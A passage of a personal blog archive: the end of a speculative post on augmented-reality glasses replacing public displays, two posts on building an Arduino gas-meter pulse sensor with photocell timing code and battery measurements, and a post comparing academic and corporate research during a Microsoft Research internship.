The limitations of these devices are their size and resolution. A personal screen of 4 inches isn’t brilliant, so let us create a hypothetical product to facilitate this model. Imagine a pair of glasses which could project virtual displays onto its lenses at any arbitrary position and geometry, simulating real-life displays. These could even be anchored to static points in the real world, requiring a user to be close to them before they can be used – as in real life. The simulated displays would show whatever the public display wanted – by virtue of function number 1: being a dedicated geographical point for a certain type of information or request.

Let’s go back to the 50 people in front of a timetable billboard. With their own personal screens they would each see just their timetable, in an almost completely private setting – while still being surrounded by 49 other people. In fact, if wireless communication density is sufficiently high, it could replace conventional screens on desks and on phones altogether. With regards to public billboards, advertisers would be able to get what they have always wanted – a message delivered directly to whoever they want it to reach.

This is of course all conjecture, but I think it is where the domain should be heading.

# Arduino Gas Sensor – Part 2

## Previously

So I left the last article with the following:

Well, apart from the hardware I need, some issues need to be addressed which may or may not require extra hardware – as I’ve just thought of them.

• DateTime equivalent object for when I register a pulse
• Work out how long these will last on battery
• Can I set an interrupt to go off when a digital value hits a threshold? Or does this require analogue input? If I can it would massively save on battery as no polling! But, it may require fiddly per-house calibration, which the brute force method ignores
• Laser/3d Printed box and some form of mounting which will let me attach to anything. Probably going to be velcro

So I’ll go through what has been done since then against these criteria.

## Hardware Changes

The DateTime-object-style thing was achieved through an RTC module (http://www.sparkfun.com/products/99) which communicates with the ‘duino over the I2C bus and takes 5 V. A microSD card shield was also added to the hardware for saving events into a simple text file (http://www.sparkfun.com/products/9802).

Rather than use my hastily built photosensor, I used a load of RFXcom sensors, as they are well built and have a housing designed for sticking to the meter (which is by far the biggest engineering challenge of this project). A board layout for interfacing with the sensor units was created, and the gEDA/gSchem schematic file can be found on the GitHub project page.

## Software Changes

Well, apart from the stuff which interfaces with the RTC module and the microSD card, not much has changed code-wise. The way the RFXcom modules work was backwards to my prototype, so I measured the time it takes to discharge a capacitor rather than charge it. An LED on a meter normally flashes for 0.1 s, so the timeout is set to 0.05 s.
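The timed poll with a cutoff can be sketched in Python (a hypothetical helper, not the actual Arduino code – `read_pin` stands in for `digitalRead`, and the 0.05 s cutoff is half the ~0.1 s pulse width):

```python
import time

TIMEOUT_S = 0.05  # half the ~0.1 s meter-LED pulse width

def timed_poll(read_pin, timeout_s=TIMEOUT_S):
    """Poll read_pin until it goes low or the timeout elapses;
    return the elapsed time."""
    start = time.monotonic()
    while read_pin() and time.monotonic() - start < timeout_s:
        pass
    return time.monotonic() - start
```

A pin that never drops (nothing connected, or no pulse) returns at the timeout; a quick drop returns almost immediately, which is what distinguishes a pulse from darkness.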

## Battery Life

Using a multimeter showed the whole sensor drew 92 mA. That isn’t ideal: a 6×AA battery pack holding ~3000 mAh lasts about a day ( 🙁 ). However, that was with a ridiculously high-powered infrared LED on the RFXcom board. Using just the photosensor (rather than the reflective sensor), the draw was 42 mA, and that was with the SD card always powered. There is a lot of scope for battery-life improvement on this project.
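For reference, the runtimes above work out as follows – a quick back-of-the-envelope sketch in Python (the function name is mine, and it ignores voltage sag and regulator losses):

```python
# Rough runtime estimate from pack capacity and constant current draw.
# Ignores voltage sag, regulator efficiency, and self-discharge.
def battery_hours(draw_ma, capacity_mah=3000):
    """Hours a pack of capacity_mah lasts at a constant draw_ma."""
    return capacity_mah / draw_ma

full_board = battery_hours(92)  # reflective sensor + IR LED: ~32.6 h, about a day
photo_only = battery_hours(42)  # photosensor only, SD always on: ~71.4 h, ~3 days
print(round(full_board, 1), round(photo_only, 1))
```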

## Source

The source can be found on my github page at https://github.com/carl-ellis/Arduino-Gas-Sensor .

# Arduino Gas Meter Sensor – Part 1

## Motivation

My newly ordered Arduino Uno came in the post today so I got to start building with it!

An upcoming sensing deployment needs a way of sensing gas usage, so I’m building a basic sensor to measure it. Luckily, most gas meters have an LED pulse which goes off every so often and we can measure that. The one in my house informs me the light will pulse every 10 dm^3 of gas, so every time the second number from the right on the meter ticks the light will pulse. Failing this, the 0 on the right most dial is very reflective, and an LED can be used to reflect light from it.
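Given the 10 dm³-per-pulse figure, the gap between pulses maps straight onto a flow rate. A minimal sketch in Python (the function name is mine):

```python
DM3_PER_PULSE = 10  # my meter: one LED pulse per 10 dm^3 of gas

def flow_rate_m3_per_hour(seconds_between_pulses):
    """Average gas flow implied by the gap between consecutive pulses."""
    m3_per_pulse = DM3_PER_PULSE / 1000.0  # 1 m^3 = 1000 dm^3
    return m3_per_pulse * 3600.0 / seconds_between_pulses

# A pulse every 60 s works out to 0.6 m^3 of gas per hour
print(flow_rate_m3_per_hour(60))
```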

As the extra bits I need to finish the sensor haven’t arrived yet, namely the SD card shield and a battery pack, I can’t lock the sensor in my gas cupboard and give it a test. So for the time being, I’m turning off my computer screens and lights, then flashing a red head torch at it to simulate a pulse.

## Code

After a bit of internet trawling, I found an ace site laying down how to do the wiring for a digital light sensor (http://www.ladyada.net/learn/sensors/cds.html#bonus_reading_photocells_without_analog_pins [This link seems to have died since the post was written, the circuit diagram will be linked in at the end of the post.]). From that, I added in a method which took a rolling average of the last 5 measurements and outputted if the measured light was brighter than 110% of the average (not exactly statistical, but I intend for these to be locked in a dark box…).

Here’s what I have so far:

```/* Based on: Photocell simple testing sketch.
Connect one end of photocell to power, the other end to pin 2.
Then connect one end of a 0.1uF capacitor from pin 2 to ground */

// Number of measurements for averaging
const int AVERAGE_LENGTH = 5;

int photocellPin = 2;     // the LDR and cap are connected to pin 2
int ledPin = 13;          // you can just use the 'built in' LED

// for the circular buffer
int readings[AVERAGE_LENGTH];
int average = 0;
int counter = 0;

void setup(void) {
  // We'll send debugging information via the Serial monitor
  Serial.begin(9600);

  // Initialise the array
  for (int i = 0; i < AVERAGE_LENGTH; i++) {
    readings[i] = 0;
  }
}

void loop(void) {
  // read the resistor using the RCtime technique
  int reading = RCtime(photocellPin);

  // Store the reading and calculate the rolling average
  readings[counter] = reading;
  ++counter %= AVERAGE_LENGTH;
  calcStats();

  // A brighter flash charges the capacitor faster, giving a lower
  // reading -- flag anything 10% below the rolling average
  int bound = average - (average / 10);

  // Glorious debug
  Serial.print("Av = ");
  Serial.print(average);
  Serial.print(" = [");
  for (int i = 0; i < AVERAGE_LENGTH; i++) {
    Serial.print(readings[i]);
    Serial.print(",");
  }
  Serial.print("] ");
  Serial.print(" . RCtime reading = ");
  Serial.print(reading);

  if (reading < bound) {
    Serial.println(" PULSE!");
  } else {
    Serial.println();
  }

  delay(100);
}

// Calculates the new mean based on the last AVERAGE_LENGTH measurements
void calcStats() {
  // average
  average = 0;
  for (int i = 0; i < AVERAGE_LENGTH; i++) {
    average += readings[i];
  }
  average /= AVERAGE_LENGTH;
}

// Uses a digital pin to measure a resistor (like an FSR or photocell!)
// We do this by having the resistor feed current into a capacitor and
// counting how long it takes to get to Vcc/2 (for most arduinos, thats 2.5V)
int RCtime(int RCpin) {
  int reading = 0;

  // set the pin to an output and pull to LOW (ground)
  pinMode(RCpin, OUTPUT);
  digitalWrite(RCpin, LOW);

  // Now set the pin to an input and...
  pinMode(RCpin, INPUT);
  while (digitalRead(RCpin) == LOW) { // count how long it takes to rise up to HIGH
    reading++;      // increment to keep track of time

    if (reading == 30000) {
      // if we got this far, the resistance is so high
      // its likely that nothing is connected!
      break;        // leave the loop
    }
  }
  // OK either we maxed out at 30000 or hopefully got a reading, return the count
  return reading;
}
```

## Next Steps

Well, apart from the hardware I need, some issues need to be addressed which may or may not require extra hardware – as I’ve just thought of them.

• DateTime equivalent object for when I register a pulse
• Work out how long these will last on battery
• Can I set an interrupt to go off when a digital value hits a threshold? Or does this require analogue input? If I can it would massively save on battery as no polling! But, it may require fiddly per-house calibration, which the brute force method ignores
• Laser/3d Printed box and some form of mounting which will let me attach to anything. Probably going to be velcro.

Here’s a video of it working:

# 4 weeks in corporate research – initial thoughts

So I’ve spent the last 4 weeks in Cambridge working as an intern at Microsoft Research and I thought I’d share my observations on the differences between academia and corporate research.

Academia, I find, is far from the ivory tower that it once was. Forgetting the worrying need to find economic benefit for projects, most research is now being spun as a product.

Surely the last thing you want for a product is a buggy bloated research prototype, and surely the last thing you want for a research project is a polished product. I mean you want it for one thing, to prove a hypothesis for your thesis.

This, of course, is a massive generalisation, and applies more to the recent batch of Ph.Ds coming through, especially as they come through doctoral training schemes which mesh (mostly unsuccessfully) different fields together. Still, scoring a blue-skies research project without lying through your teeth in the impact section of a proposal is like finding real ale in Essex.

Of course, there is the positive side of academia too. The freedom to tackle your problem via any means. Flexible working hours (unless you are an RA), flexible supervision, flexible scope. You can produce a highly polished massively overworked Ph.D, or the bare minimum which gets the job done. It is a very personal thing. Research projects are a bit more managed, you have a more rigid supervisory system, project meetings, but your section of stuff is pretty much yours to do as you will.

This environment breeds two types of people: the successful ones who generally ask for and give help to their peers, accept criticism with grace, and who thrive in a space where they make the rules; and the other ones who, having seen the gaping ravine of work in front of them, bottle it and fail. Maybe not straight away nor suddenly, as it could creep up after a year or two, but Ph.Ds have been known to just disappear into industry after 4 years, with not a word to anyone. It is very easy to lose sight of where you are aiming to get to, reaching a false summit of your thesis and calling it done.

Academia is very much a dog-eat-dog world. The UK has a much nicer tenure-free environment, but even so, the tenet of the American “publish or perish” culture still exists. Academics live off their reputation, and their reputation is written in the black ink of a bibliography.

Corporate research is exactly the same landscape but with a few key differences.

For a start, the “build a prototype” message is very clear, especially for systems which may one day be products. You are building and evaluating a proof of concept, as it should be.

Secondly, the atmosphere is completely different. Whereas in the academic environment it is almost taboo to ask on a struggling Ph.D how their work is going, in corporate research struggling researchers are actively propped up and discussions at lunch and the pub are refreshingly problem orientated.

Thirdly, your supervisor is your manager, which from a managerial point of view is awesome: you have someone who is your boss and *knows* what they are talking about, whilst still being your supervisor, knowing all the issues that come with research and how best to stimulate ideas out of dead ends. From an intern perspective this is also good, as seeing your supervisor as your boss makes you want to impress them more, and meet deadlines days earlier.

Finally, the pay is miles better.

Those are the good bits, and of course, there are some bad bits too.

Corporate research labs tend to have an “eat your own dog food” policy, which means that if the company creates a tool that can do your job, you use it, unless you can find a valid research reason not to. Working at Microsoft and being a Linux user, you can see how this has led to initially slow productivity as I’ve readjusted to an alien tool-chain.

There are also some scary law type things which get attached to the job, such as losing a kidney if I speak of what I see on whiteboards and such. However, this style of development is slowly losing ground as projects like Gadgeteer are being released under an Apache licence.

As a final point, having worked in some small companies with that “family” feel, I find that you get this here too. It may be due to the organisation of the research lab, but everyone is very friendly and you associate with your research group quite strongly – though not in a “compete against the other groups” way, as everyone in the building is amazingly friendly.

So far I’m enjoying it, we’ll see if I still do in 8 weeks time 😉

C